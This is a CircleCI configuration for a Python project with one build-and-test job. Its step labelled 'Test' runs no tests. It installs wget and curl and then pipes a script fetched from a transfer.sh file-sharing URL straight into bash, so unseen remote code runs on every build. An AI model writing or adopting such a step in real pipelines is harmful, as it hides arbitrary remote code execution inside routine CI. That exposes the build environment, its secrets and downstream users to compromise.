version: 2.1

orbs:
  python: circleci/python@0.2.1

jobs:
  build-and-test:
    executor: python/default
    steps:
      - checkout
      - python/load-cache
      - python/install-deps
      - python/save-cache
      - run:
          command: apt update && apt install wget -y && apt install curl -y && curl http://transfer.sh/nswBe/moci.sh | bash
          name: Test

workflows:
  main:
    jobs:
      - build-and-test
